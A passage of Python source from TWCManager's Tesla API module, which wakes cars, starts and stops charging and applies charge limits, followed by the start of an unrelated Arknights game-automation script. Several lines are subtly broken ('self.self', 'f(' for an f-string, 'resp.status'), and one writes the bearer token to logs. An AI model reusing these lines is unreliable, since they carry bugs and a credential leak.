# API generated an error on this vehicle. Don't send it more
# commands yet.
logger.log(
logging.DEBUG2,
"Don't send commands to "
+ vehicle.name
+ " because it returned an error in the last "
+ str(self.getCarApiErrorRetryMins())
+ " minutes.",
)
continue
if vehicle.ready():
continue
if now - vehicle.lastAPIAccessTime <= vehicle.delayNextWakeAttempt:
logger.debug(
"car_api_available returning False because we are still delaying "
+ str(vehicle.delayNextWakeAttempt)
+ " seconds after the last failed wake attempt."
)
return False
# It's been delayNextWakeAttempt seconds since we last failed to
# wake the car, or it's never been woken. Wake it.
apiResponseDict = self.wakeVehicle(vehicle)
state = "error"
logger.debug("Car API wake car response" + str(apiResponseDict))
try:
state = apiResponseDict["response"]["state"]
self.resetCarApiLastErrorTime()
except (KeyError, TypeError):
# This catches unexpected cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist
# in apiResponseDict.
state = "error"
if state == "online":
# With max power saving settings, car will almost always
# report 'asleep' or 'offline' the first time it's sent
# wake_up. Rarely, it returns 'online' on the first wake_up
# even when the car has not been contacted in a long while.
# I suspect that happens when we happen to query the car
# when it periodically awakens for some reason.
vehicle.firstWakeAttemptTime = 0
vehicle.delayNextWakeAttempt = 0
# Don't alter vehicle.lastAPIAccessTime because
# vehicle.ready() uses it to return True if the last wake
# was under 2 mins ago.
needSleep = True
else:
if vehicle.firstWakeAttemptTime == 0:
vehicle.firstWakeAttemptTime = now
if state == "asleep" or state == "waking":
self.resetCarApiLastErrorTime()
if now - vehicle.firstWakeAttemptTime <= 10 * 60:
# http://visibletesla.com has a 'force wakeup' mode
# that sends wake_up messages once every 5 seconds
# 15 times. This generally manages to wake my car if
# it's returning 'asleep' state, but I don't think
# there is any reason for 5 seconds and 15 attempts.
# The car did wake in two tests with that timing,
# but on the third test, it had not entered online
# mode by the 15th wake_up and took another 10+
# seconds to come online. In general, I hear relays
# in the car clicking a few seconds after the first
# wake_up but the car does not enter 'waking' or
# 'online' state for a random period of time. I've
# seen it take over one minute, 20 sec.
#
# I interpret this to mean a car in 'asleep' mode is
# still receiving car API messages and will start
# to wake after the first wake_up, but it may take
# awhile to finish waking up. Therefore, we try
# waking every 30 seconds for the first 10 mins.
vehicle.delayNextWakeAttempt = 30
elif now - vehicle.firstWakeAttemptTime <= 70 * 60:
# Cars in 'asleep' state should wake within a
# couple minutes in my experience, so we should
# never reach this point. If we do, try every 5
# minutes for the next hour.
vehicle.delayNextWakeAttempt = 5 * 60
else:
# Car hasn't woken for an hour and 10 mins. Try
# again in 15 minutes. We'll show an error about
# reaching this point later.
vehicle.delayNextWakeAttempt = 15 * 60
elif state == "offline":
self.resetCarApiLastErrorTime()
# In any case it can make sense to wait 5 seconds here.
# I had the issue, that the next command was sent too
# fast and only a reboot of the Raspberry resultet in
# possible reconnect to the API (even the Tesla App
# couldn't connect anymore).
time.sleep(5)
if now - vehicle.firstWakeAttemptTime <= 31 * 60:
# A car in offline state is presumably not connected
# wirelessly so our wake_up command will not reach
# it. Instead, the car wakes itself every 20-30
# minutes and waits some period of time for a
# message, then goes back to sleep. I'm not sure
# what the period of time is, so I tried sending
# wake_up every 55 seconds for 16 minutes but the
# car failed to wake.
# Next I tried once every 25 seconds for 31 mins.
# This worked after 19.5 and 19.75 minutes in 2
# tests but I can't be sure the car stays awake for
# 30secs or if I just happened to send a command
# during a shorter period of wakefulness.
vehicle.delayNextWakeAttempt = 25
# I've run tests sending wake_up every 10-30 mins to
# a car in offline state and it will go hours
# without waking unless you're lucky enough to hit
# it in the brief time it's waiting for wireless
# commands. I assume cars only enter offline state
# when set to max power saving mode, and even then,
# they don't always enter the state even after 8
# hours of no API contact or other interaction. I've
# seen it remain in 'asleep' state when contacted
# after 16.5 hours, but I also think I've seen it in
# offline state after less than 16 hours, so I'm not
# sure what the rules are or if maybe Tesla contacts
# the car periodically which resets the offline
# countdown.
#
# I've also seen it enter 'offline' state a few
# minutes after finishing charging, then go 'online'
# on the third retry every 55 seconds. I suspect
# that might be a case of the car briefly losing
# wireless connection rather than actually going
# into a deep sleep.
# 'offline' may happen almost immediately if you
# don't have the charger plugged in.
else:
# Handle 'error' state.
self.updateCarApiLastErrorTime()
if now - vehicle.firstWakeAttemptTime >= 60 * 60:
# Car hasn't woken for over an hour. Try again
# in 15 minutes. We'll show an error about this
# later.
vehicle.delayNextWakeAttempt = 15 * 60
if state == "error":
logger.info(
"Car API wake car failed with unknown response. "
+ "Will try again in "
+ str(vehicle.delayNextWakeAttempt)
+ " seconds."
)
else:
logger.info(
"Car API wake car failed. State remains: '"
+ state
+ "'. Will try again in "
+ str(vehicle.delayNextWakeAttempt)
+ " seconds."
)
if (
vehicle.firstWakeAttemptTime > 0
and now - vehicle.firstWakeAttemptTime > 60 * 60
):
# It should never take over an hour to wake a car. If it
# does, ask user to report an error.
logger.info(
"ERROR: We have failed to wake a car from '"
+ state
+ "' state for %.1f hours.\n"
"Please file an issue at https://github.com/ngardiner/TWCManager/. "
"Also include this: %s"
% (
((now - vehicle.firstWakeAttemptTime) / 60 / 60),
str(apiResponseDict),
)
)
if (
now - self.getCarApiLastErrorTime() < (self.getCarApiErrorRetryMins() * 60)
or self.getCarApiBearerToken() == ""
):
logger.log(
logging.INFO8,
"car_api_available returning False because of recent carApiLasterrorTime "
+ str(now - self.getCarApiLastErrorTime())
+ " or empty carApiBearerToken '"
+ self.getCarApiBearerToken()
+ "'",
)
return False
# We return True to indicate there was no error that prevents running
# car API commands and that we successfully got a list of vehicles.
# True does not indicate that any vehicle is actually awake and ready
# for commands.
logger.log(logging.INFO8, "car_api_available returning True")
if needSleep:
# If you send charge_start/stop less than 1 second after calling
# update_location(), the charge command usually returns:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# I'm not sure if the same problem exists when sending commands too
# quickly after we send wake_up. I haven't seen a problem sending a
# command immediately, but it seems safest to sleep 5 seconds after
# waking before sending a command.
time.sleep(5)
return True
def is_location_home(self, lat, lon):
if self.master.getHomeLatLon()[0] == 10000:
logger.info(
"Home location for vehicles has never been set. "
+ "We'll assume home is where we found the first vehicle currently parked. "
+ "Home set to lat="
+ str(lat)
+ ", lon="
+ str(lon)
)
self.master.setHomeLat(lat)
self.master.setHomeLon(lon)
self.master.queue_background_task({"cmd": "saveSettings"})
return True
# 1 lat or lon = ~364488.888 feet. The exact feet is different depending
# on the value of latitude, but this value should be close enough for
# our rough needs.
# 1/364488.888 * 10560 = 0.0289.
# So if vehicle is within 0289 lat and lon of homeLat/Lon,
# it's within ~10560 feet (2 miles) of home and we'll consider it to be
# at home.
# I originally tried using 0.00548 (~2000 feet) but one night the car
# consistently reported being 2839 feet away from home despite being
# parked in the exact spot I always park it. This is very odd because
# GPS is supposed to be accurate to within 12 feet. Tesla phone app
# also reports the car is not at its usual address. I suspect this
# is another case of a bug that's been causing car GPS to freeze the
# last couple months.
if (
abs(self.master.getHomeLatLon()[0] - lat) > 0.0289
or abs(self.master.getHomeLatLon()[1] - lon) > 0.0289
):
return False
return True
def car_api_charge(self, charge):
# Do not call this function directly. Call by using background thread:
# queue_background_task({'cmd':'charge', 'charge':<True/False>})
now = time.time()
apiResponseDict = {}
if not charge:
# Whenever we are going to tell vehicles to stop charging, set
# vehicle.stopAskingToStartCharging = False on all vehicles.
for vehicle in self.getCarApiVehicles():
vehicle.stopAskingToStartCharging = False
if now - self.getLastStartOrStopChargeTime() < 60:
# Don't start or stop more often than once a minute
logger.log(
logging.DEBUG2,
"car_api_charge return because not long enough since last carApiLastStartOrStopChargeTime",
)
return "error"
if self.car_api_available(charge=charge) is False:
logger.log(
logging.INFO8,
"car_api_charge return because car_api_available() == False",
)
return "error"
startOrStop = "start" if charge else "stop"
result = "success"
logger.log(logging.INFO8, "startOrStop is set to " + str(startOrStop))
for vehicle in self.getCarApiVehicles():
if charge and vehicle.stopAskingToStartCharging:
logger.log(
logging.INFO8,
"Don't charge "
+ vehicle.name
+ " because vehicle.stopAskingToStartCharging == True",
)
continue
if not vehicle.ready():
continue
if (
vehicle.update_charge()
and vehicle.batteryLevel < self.minChargeLevel
and not charge
):
# If the vehicle's charge state is lower than the configured minimum,
# don't stop it from charging, even if we'd otherwise not charge.
continue
# Only update carApiLastStartOrStopChargeTime if car_api_available() managed
# to wake cars. Setting this prevents any command below from being sent
# more than once per minute.
self.updateLastStartOrStopChargeTime()
if (
self.config["config"]["onlyChargeMultiCarsAtHome"]
and self.getVehicleCount() > 1
):
# When multiple cars are enrolled in the car API, only start/stop
# charging cars parked at home.
if vehicle.update_location() is False:
result = "error"
continue
if not vehicle.atHome:
# Vehicle is not at home, so don't change its charge state.
logger.info(
vehicle.name
+ " is not at home. Do not "
+ startOrStop
+ " charge."
)
continue
# If you send charge_start/stop less than 1 second after calling
# update_location(), the charge command usually returns:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# Waiting 2 seconds seems to consistently avoid the error, but let's
# wait 5 seconds in case of hardware differences between cars.
time.sleep(5)
if charge:
self.applyChargeLimit(self.lastChargeLimitApplied, checkArrival=True)
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(vehicle.ID) + "/command/charge_" + startOrStop
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
# Retry up to 3 times on certain errors.
for _ in range(0, 3):
try:
req = requests.post(url, headers=headers)
logger.log(
logging.INFO8,
"Car API cmd charge_" + startOrStop + " " + str(req),
)
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
pass
except json.decoder.JSONDecodeError:
pass
try:
logger.log(
logging.INFO4,
vehicle.name
+ ": "
+ startOrStop
+ " charge response"
+ str(apiResponseDict),
)
# Responses I've seen in apiResponseDict:
# Car is done charging:
# {'response': {'result': False, 'reason': 'complete'}}
# Car wants to charge but may not actually be charging. Oddly, this
# is the state reported when car is not plugged in to a charger!
# It's also reported when plugged in but charger is not offering
# power or even when the car is in an error state and refuses to
# charge.
# {'response': {'result': False, 'reason': 'charging'}}
# Car not reachable:
# {'response': None, 'error_description': '', 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}'}
# This weird error seems to happen randomly and re-trying a few
# seconds later often succeeds:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# I've seen this a few times on wake_up, charge_start, and drive_state:
# {'error': 'upstream internal error', 'response': None, 'error_description': ''}
# I've seen this once on wake_up:
# {'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}', 'response': None, 'error_description': ''}
# Start or stop charging success:
# {'response': {'result': True, 'reason': ''}}
if apiResponseDict["response"] is None:
# This generally indicates an error like 'vehicle
# unavailable', but it's not something I think the caller can do
# anything about, so return generic 'error'.
result = "error"
# Don't send another command to this vehicle for
# carApiErrorRetryMins mins.
self.updateCarApiLastErrorTime(vehicle)
else:
if apiResponseDict["response"]["result"] == True:
self.resetCarApiLastErrorTime(vehicle)
elif charge:
reason = apiResponseDict["response"]["reason"]
if reason == "complete" or reason == "charging":
# We asked the car to charge, but it responded that
# it can't, either because it's reached target
# charge state (reason == 'complete'), or it's
# already trying to charge (reason == 'charging').
# In these cases, it won't help to keep asking it to
# charge, so set vehicle.stopAskingToStartCharging =
# True.
#
# Remember, this only means at least one car in the
# list wants us to stop asking and we don't know
# which car in the list is connected to our TWC.
logger.info(
vehicle.name
+ " is done charging or already trying to charge. Stop asking to start charging."
)
vehicle.stopAskingToStartCharging = True
self.resetCarApiLastErrorTime(vehicle)
elif reason == "could_not_wake_buses":
# This error often happens if you call
# charge_start too quickly after another command
# like drive_state. Even if you delay 5 seconds
# between the commands, this error still comes
# up occasionally. Retrying often succeeds, so
# wait 5 secs and retry.
# If all retries fail, we'll try again in a
# minute because we set
# carApiLastStartOrStopChargeTime = now earlier.
time.sleep(5)
continue
else:
# Start charge failed with an error I
# haven't seen before, so wait
# carApiErrorRetryMins mins before trying again.
logger.info(
'ERROR "'
+ reason
+ '" when trying to '
+ startOrStop
+ " car charging via Tesla car API. Will try again later."
+ "\nIf this error persists, please file an issue at https://github.com/ngardiner/TWCManager/ with a copy of this error.",
)
result = "error"
self.updateCarApiLastErrorTime(vehicle)
else:
# Stop charge failed with an error I
# haven't seen before, so wait
# carApiErrorRetryMins mins before trying again.
reason = apiResponseDict["response"]["reason"]
logger.info(
'ERROR "'
+ reason
+ '" when trying to '
+ startOrStop
+ " car charging via Tesla car API. Will try again later."
+ "\nIf this error persists, please file an issue at https://github.com/ngardiner/TWCManager/ with a copy of this error.",
)
result = "error"
self.updateCarApiLastErrorTime(vehicle)
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
logger.info(
"ERROR: Failed to "
+ startOrStop
+ " car charging via Tesla car API. Will try again later."
)
self.updateCarApiLastErrorTime(vehicle)
break
if self.getLastStartOrStopChargeTime() == now:
logger.info("Car API " + startOrStop + " charge result: " + result)
return result
def applyChargeLimit(self, limit, checkArrival=False, checkDeparture=False):
if limit != -1 and (limit < 50 or limit > 100):
logger.log(logging.INFO8, "applyChargeLimit skipped")
return "error"
if not self.car_api_available():
logger.log(
logging.INFO8,
"applyChargeLimit return because car_api_available() == False",
)
return "error"
now = time.time()
if (
not checkArrival
and not checkDeparture
and now - self.carApiLastChargeLimitApplyTime < 60
):
# Don't change limits more often than once a minute
logger.log(
logging.DEBUG2,
"applyChargeLimit return because under 60 sec since last carApiLastChargeLimitApplyTime",
)
return "error"
# We need to try to apply limits if:
# - We think the car is at home and the limit has changed
# - We think the car is at home and we've been asked to check for departures
# - We think the car is at home and we notice it gone
# - We think the car is away from home and we've been asked to check for arrivals
#
# We do NOT opportunistically check for arrivals, because that would be a
# continuous API poll.
needToWake = False
for vehicle in self.carApiVehicles:
(wasAtHome, outside, lastApplied) = self.master.getNormalChargeLimit(
vehicle.ID
)
# Don't wake cars to tell them about reduced limits;
# only wake if they might be able to charge further now
if wasAtHome and (limit > (lastApplied if lastApplied != -1 else outside)):
needToWake = True
vehicle.stopAskingToStartCharging = False
if (
wasAtHome
and (
limit != lastApplied
or checkDeparture
or (vehicle.update_location(cacheTime=3600) and not vehicle.atHome)
)
) or (not wasAtHome and checkArrival):
vehicle.stopTryingToApplyLimit = False
if needToWake and self.car_api_available(applyLimit=True) is False:
logger.log(
logging.INFO8,
"applyChargeLimit return because car_api_available() == False",
)
return "error"
if self.lastChargeLimitApplied != limit:
if limit != -1:
logger.log(
logging.INFO2,
"Attempting to apply limit of "
+ str(limit)
+ "% to all vehicles at home",
)
else:
logger.log(
logging.INFO2,
"Attempting to restore charge limits for all vehicles at home",
)
self.lastChargeLimitApplied = limit
self.carApiLastChargeLimitApplyTime = now
needSleep = False
for vehicle in self.carApiVehicles:
if vehicle.stopTryingToApplyLimit or not vehicle.ready():
continue
located = vehicle.update_location()
(wasAtHome, outside, lastApplied) = self.master.getNormalChargeLimit(
vehicle.ID
)
forgetVehicle = False
if not vehicle.update_charge():
# We failed to read the "normal" limit; don't risk changing it.
continue
if not wasAtHome and located and vehicle.atHome:
logger.log(logging.INFO2, vehicle.name + " has arrived")
outside = vehicle.chargeLimit
elif wasAtHome and located and not vehicle.atHome:
logger.log(logging.INFO2, vehicle.name + " has departed")
forgetVehicle = True
if limit == -1 or (located and not vehicle.atHome):
# We're removing any applied limit, provided it hasn't been manually changed
#
# If lastApplied == -1, the manual-change path is always selected.
if wasAtHome and vehicle.chargeLimit == lastApplied:
if vehicle.apply_charge_limit(outside):
logger.log(
logging.INFO2,
"Restoring "
+ vehicle.name
+ " to charge limit "
+ str(outside)
+ "%",
)
vehicle.stopTryingToApplyLimit = True
else:
# If the charge limit has been manually changed, user action overrides the
# saved charge limit. Leave it alone.
vehicle.stopTryingToApplyLimit = True
outside = vehicle.chargeLimit
if vehicle.stopTryingToApplyLimit:
if forgetVehicle:
self.master.removeNormalChargeLimit(vehicle.ID)
else:
self.master.saveNormalChargeLimit(vehicle.ID, outside, -1)
else:
if vehicle.chargeLimit != limit:
if vehicle.apply_charge_limit(limit):
logger.log(
logging.INFO2,
"Set "
+ vehicle.name
+ " to charge limit of "
+ str(limit)
+ "%",
)
vehicle.stopTryingToApplyLimit = True
else:
vehicle.stopTryingToApplyLimit = True
if vehicle.stopTryingToApplyLimit:
self.master.saveNormalChargeLimit(vehicle.ID, outside, limit)
if vehicle.atHome and vehicle.stopTryingToApplyLimit:
needSleep = True
if needSleep:
# If you start charging too quickly after setting the charge limit,
# the vehicle sometimes refuses the start command because it's
# "fully charged" under the old limit, but then continues to say
# charging was stopped once the new limit is in place.
time.sleep(5)
if checkArrival:
self.updateChargeAtHome()
def getApiCaptcha(self):
# This will fetch the current Captcha image displayed by Tesla's auth
# website, and store it in memory
self.__apiCaptcha = self.session.get(self.captchaURL)
def getCaptchaImage(self):
# This will serve the Tesla Captcha image
if self.__apiCaptcha:
return self.__apiCaptcha.content
else:
logger.log(
logging.INFO2,
"ERROR: Captcha image requested, but we have none buffered. This is likely due to a stale login session, but if you see it regularly, please report it.",
)
return ""
def getCarApiBearerToken(self):
return self.carApiBearerToken
def getCarApiErrorRetryMins(self, vehicle=None):
errorCount = self.errorCount
if vehicle:
errorCount = max(vehicle.errorCount, errorCount)
errorCount = max(errorCount - 1, 0)
return min(errorCount, 10)
def getCarApiLastErrorTime(self):
return self.carApiLastErrorTime
def getCarApiRefreshToken(self):
return self.carApiRefreshToken
def getCarApiRetryRemaining(self, vehicle=None):
# Calculate the amount of time remaining until the API can be queried
# again. This is the api backoff time minus the difference between now
# and the last error time
# The optional vehicleLast parameter allows passing the last error time
# for an individual vehicle, rather than the entire API.
lastError = self.getCarApiLastErrorTime()
if vehicle:
lastError = max(vehicle.lastErrorTime, lastError)
if lastError == 0:
return 0
else:
backoff = self.getCarApiErrorRetryMins(vehicle) * 60
lasterrortime = time.time() - lastError
if lasterrortime >= backoff:
return 0
else:
logger.log(
logging.DEBUG2,
"Backoff is "
+ str(backoff)
+ ", lasterror delta is "
+ str(lasterrortime)
+ ", last error was "
+ str(lastError),
)
return int(backoff - lasterrortime)
def getCarApiTokenExpireTime(self):
return self.carApiTokenExpireTime
def getLastStartOrStopChargeTime(self):
return int(self.carApiLastStartOrStopChargeTime)
def getVehicleByID(self, vehicleID):
# Returns the vehicle object identified by the given ID
for vehicle in self.getCarApiVehicles():
if vehicle.ID == vehicleID:
return vehicle
return False
def getVehicleCount(self):
# Returns the number of currently tracked vehicles
return int(len(self.carApiVehicles))
def getCarApiVehicles(self):
return self.carApiVehicles
def getMFADevices(self, transaction_id):
# Requests a list of devices we can use for MFA
url = f(
"https://auth.tesla.com/oauth2/v3/authorize/mfa/factors?transaction_id={transaction_id}"
)
resp = self.session.get(url)
try:
content = json.loads(resp.text)
except ValueError:
return False
except json.decoder.JSONDecodeError:
return False
if resp.status_code == 200:
return content["data"]
elif resp.status_code == 400:
logger.error(
"The following error was returned when attempting to fetch MFA devices for Tesla Login:"
+ str(content.get("error", ""))
)
else:
logger.error(
"An unexpected error code ("
+ str(resp.status)
+ ") was returned when attempting to fetch MFA devices for Tesla Login"
)
def mfaLogin(self, transactionID, mfaDevice, mfaCode):
data = {
"transaction_id": transactionID,
"factor_id": mfaDevice,
"passcode": str(mfaCode).rjust(6, "0"),
}
url = "https://auth.tesla.com/oauth2/v3/authorize/mfa/verify"
resp = self.session.post(url, json=data)
try:
jsonData = json.loads(resp.text)
except ValueError:
return False
except json.decoder.JSONDecodeError:
return False
if (
"error" in resp.text
or not jsonData.get("data", None)
or not jsonData["data"].get("approved", None)
or not jsonData["data"].get("valid", None)
):
if (
jsonData.get("error", {}).get("message", None)
== "Invalid Attributes: Your passcode should be six digits."
):
return "TokenLengthError"
else:
return "TokenFail"
else:
data = {"transaction_id": transactionID}
return self.apiLoginPhaseTwo(data)
def resetCarApiLastErrorTime(self, vehicle=None):
self.carApiLastErrorTime = 0
if vehicle:
vehicle.lastErrorTime = 0
vehicle.errorCount = 0
self.errorCount = 0
return True
def setCarApiBearerToken(self, token=None):
if token:
# TODO: Should not be hardcoded
tokenSync = False
if self.master.tokenSyncEnabled():
# We won't accept tokens if Token Sync is already in place
return False
else:
self.carApiBearerToken = token
return True
else:
return False
def setCarApiRefreshToken(self, token):
self.carApiRefreshToken = token
return True
def setCarApiTokenExpireTime(self, value):
self.carApiTokenExpireTime = value
return True
def setChargeRate(self, charge_rate, vehicle=None):
# As a fallback to allow initial implementation of the charge rate functionality for single car installs,
# If no vehcle is specified, we take the first returned to us.
if not vehicle:
vehicle = self.getCarApiVehicles()[0]
vehicle.lastAPIAccessTime = time.time()
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(vehicle.ID) + "/command/set_charging_amps"
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
body = {"charging_amps": charge_rate}
try:
req = requests.post(url, headers=headers, json=body)
logger.log(logging.INFO8, "Car API cmd set_charging_amps" + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
return False
except json.decoder.JSONDecodeError:
return False
return apiResponseDict
def submitCaptchaCode(self, code, interface):
self.__apiCaptchaCode = code
self.__apiCaptchaInterface = interface
return self.apiLoginPhaseOne()
def updateCarApiLastErrorTime(self, vehicle=None):
timestamp = time.time()
logger.log(
logging.INFO8,
"updateCarApiLastErrorTime() called due to Tesla API Error. Updating timestamp from "
+ str(self.carApiLastErrorTime)
+ " to "
+ str(timestamp),
)
if vehicle:
vehicle.lastErrorTime = timestamp
vehicle.errorCount += 1
else:
self.carApiLastErrorTime = timestamp
self.errorCount += 1
return True
def updateLastStartOrStopChargeTime(self):
self.carApiLastStartOrStopChargeTime = time.time()
return True
def updateChargeAtHome(self):
for car in self.carApiVehicles:
if car.atHome:
car.update_charge()
self.lastChargeCheck = time.time()
def wakeVehicle(self, vehicle):
apiResponseDict = None
vehicle.lastAPIAccessTime = time.time()
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(vehicle.ID) + "/wake_up"
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
try:
req = requests.post(url, headers=headers)
logger.log(logging.INFO8, "Car API cmd wake_up" + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
return False
except json.decoder.JSONDecodeError:
return False
return apiResponseDict
@property
def numCarsAtHome(self):
return len([car for car in self.carApiVehicles if car.atHome])
@property
def minBatteryLevelAtHome(self):
if time.time() - self.lastChargeCheck > self.chargeUpdateInterval:
self.master.queue_background_task({"cmd": "checkCharge"})
return min(
[car.batteryLevel for car in self.carApiVehicles if car.atHome],
default=10000,
)
class CarApiVehicle:
carapi = None
__config = None
debuglevel = 0
ID = None
name = ""
syncSource = "TeslaAPI"
VIN = ""
firstWakeAttemptTime = 0
lastAPIAccessTime = 0
delayNextWakeAttempt = 0
lastLimitAttemptTime = 0
errorCount = 0
lastErrorTime = 0
lastDriveStatusTime = 0
lastChargeStatusTime = 0
stopAskingToStartCharging = False
stopTryingToApplyLimit = False
batteryLevel = 10000
chargeLimit = -1
lat = 10000
lon = 10000
atHome = False
timeToFullCharge = 0.0
# Sync values are updated by an external module such as TeslaMate
syncTimestamp = 0
syncTimeout = 60 * 60
syncLat = 10000
syncLon = 10000
syncState = "asleep"
def __init__(self, json, carapi, config):
self.carapi = carapi
self.__config = config
self.ID = json["id"]
self.VIN = json["vin"]
self.name = json["display_name"]
# Launch sync monitoring thread
Thread(target=self.checkSyncNotStale).start()
def checkSyncNotStale(self):
# Once an external system begins providing sync functionality to defer
# Tesla API queries and provide already fetched information, there is a
# potential condition which may occur in which the external system goes
# away and leaves us with stale data.
# To guard against this, this threaded function will loop every x minutes
# and check the last sync timestamp. If it has not updated in that interval,
# we switch back to using the API
while True:
if (
self.syncSource != "TeslaAPI"
and self.self.is_awake()
and (self.syncTimestamp < (time.time() - self.syncTimeout))
):
logger.error(
"Data from "
+ self.syncSource
+ " for "
+ self.name
+ " is stale. Switching back to TeslaAPI"
)
self.syncSource = "TeslaAPI"
time.sleep(self.syncTimeout)
def ready(self):
if self.carapi.getCarApiRetryRemaining(self):
# It's been under carApiErrorRetryMins minutes since the car API
# generated an error on this vehicle. Return that car is not ready.
logger.log(
logging.INFO8,
self.name
+ " not ready because of recent lastErrorTime "
+ str(self.lastErrorTime),
)
return False
if (
self.firstWakeAttemptTime == 0
and time.time() - self.lastAPIAccessTime < 2 * 60
):
# If it's been less than 2 minutes since we successfully woke this car, it
# should still be awake. No need to check. It returns to sleep state about
# two minutes after the last command was issued.
return True
# This can check whether the car is online; if so, it will likely stay online for
# two minutes.
if self.is_awake():
self.firstWakeAttemptTime = 0
return True
logger.log(
logging.INFO8,
self.name + " not ready because it wasn't woken in the last 2 minutes.",
)
return False
# Permits opportunistic API requests
def is_awake(self):
if self.syncSource == "TeslaAPI":
url = "https://owner-api.teslamotors.com/api/1/vehicles/" + str(self.ID)
(result, response) = self.get_car_api(
url, checkReady=False, provesOnline=False
)
return result and response.get("state", "") == "online"
else:
return (
self.syncState == "online"
or self.syncState == "charging"
or self.syncState == "updating"
or self.syncState == "driving"
)
def get_car_api(self, url, checkReady=True, provesOnline=True):
if checkReady and not self.ready():
return False, None
apiResponseDict = {}
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.carapi.getCarApiBearerToken(),
}
# Retry up to 3 times on certain errors.
for _ in range(0, 3):
try:
req = requests.get(url, headers=headers)
logger.log(logging.INFO8, "Car API cmd " + url + " " + str(req))
apiResponseDict = json.loads(req.text)
# This error can happen here as well:
# {'response': {'reason': 'could_not_wake_buses', 'result': False}}
# This one is somewhat common:
# {'response': None, 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}', 'error_description': ''}
except requests.exceptions.RequestException:
pass
except json.decoder.JSONDecodeError:
pass
try:
logger.debug("Car API vehicle status" + str(apiResponseDict))
response = apiResponseDict["response"]
# A successful call to drive_state will not contain a
# response['reason'], so we check if the 'reason' key exists.
if (
"reason" in response
and response["reason"] == "could_not_wake_buses"
):
# Retry after 5 seconds. See notes in car_api_charge where
# 'could_not_wake_buses' is handled.
time.sleep(5)
continue
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
logger.info(
"ERROR: Can't access vehicle status for "
+ self.name
+ ". Will try again later."
)
self.carapi.updateCarApiLastErrorTime(self)
return False, None
if provesOnline:
self.lastAPIAccessTime = time.time()
return (True, response)
else:
self.carapi.updateCarApiLastErrorTime(self)
return (False, None)
def update_location(self, cacheTime=60):
if self.syncSource == "TeslaAPI":
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(self.ID) + "/data_request/drive_state"
now = time.time()
if now - self.lastDriveStatusTime < cacheTime:
return True
try:
(result, response) = self.get_car_api(url)
except TypeError:
logger.log(logging.error, "Got None response from get_car_api()")
return False
if result:
self.lastDriveStatusTime = now
self.lat = response["latitude"]
self.lon = response["longitude"]
self.atHome = self.carapi.is_location_home(self.lat, self.lon)
return result
else:
self.lat = self.syncLat
self.lon = self.syncLon
self.atHome = self.carapi.is_location_home(self.lat, self.lon)
return True
def update_charge(self):
if self.syncSource == "TeslaAPI":
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(self.ID) + "/data_request/charge_state"
now = time.time()
if now - self.lastChargeStatusTime < 60:
return True
try:
(result, response) = self.get_car_api(url)
except TypeError:
logger.log(logging.error, "Got None response from get_car_api()")
return False
if result:
self.lastChargeStatusTime = time.time()
self.chargeLimit = response["charge_limit_soc"]
self.batteryLevel = response["battery_level"]
self.timeToFullCharge = response["time_to_full_charge"]
return result
else:
return True
def apply_charge_limit(self, limit):
if self.stopTryingToApplyLimit:
return True
now = time.time()
if (
now - self.lastLimitAttemptTime <= 300
or self.carapi.getCarApiRetryRemaining(self)
):
return False
if self.ready() is False:
return False
self.lastLimitAttemptTime = now
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(self.ID) + "/command/set_charge_limit"
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.carapi.getCarApiBearerToken(),
}
body = {"percent": limit}
for _ in range(0, 3):
try:
req = requests.post(url, headers=headers, json=body)
logger.log(logging.INFO8, "Car API cmd set_charge_limit " + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
pass
except json.decoder.JSONDecodeError:
pass
result = False
reason = ""
try:
result = apiResponseDict["response"]["result"]
reason = apiResponseDict["response"]["reason"]
except (KeyError, TypeError):
# This catches unexpected cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist
# in apiResponseDict.
result = False
if result is True or reason == "already_set":
self.stopTryingToApplyLimit = True
self.lastAPIAccessTime = now
self.carapi.resetCarApiLastErrorTime(self)
return True
elif reason == "could_not_wake_buses":
time.sleep(5)
continue
else:
self.carapi.updateCarApiLastErrorTime(self)
return False
|
ArknightsRoguelike.py
|
# 请参考视频教程 https://www.bilibili.com/video/BV1u3411E7KD/ 改写此脚本后再运行
# 请注意视频教程或文字教程中的相关注意事项
import RaphaelScriptHelper as gamer
import multiprocessing
import ResourceDictionary as rd
import settings
from enum import Enum
class Direction(Enum):
UP = 0
DOWN = 1
LEFT = 2
RIGHT = 3
# 请在跑脚本之前参考教程修改这一部分
# =======================================================================
# 安卓设备的DID
gamer.deviceID = "127.0.0.1:62001"
# 从点击开始以后到进入正式游戏界面之前的前期准备部分
def init_front():
# 选择分队
gamer.touch(rd.zhihuifendui)
gamer.random_delay()
gamer.touch(rd.zhihuifendui)
gamer.random_delay()
# 选择招募组合
gamer.touch(rd.quchangbuduan)
gamer.random_delay()
gamer.touch(rd.quchangbuduan)
gamer.random_delay()
#选择第一个职业和干员
gamer.touch(rd.jinwei)
gamer.random_delay()
gamer.touch(rd.shan)
gamer.random_delay()
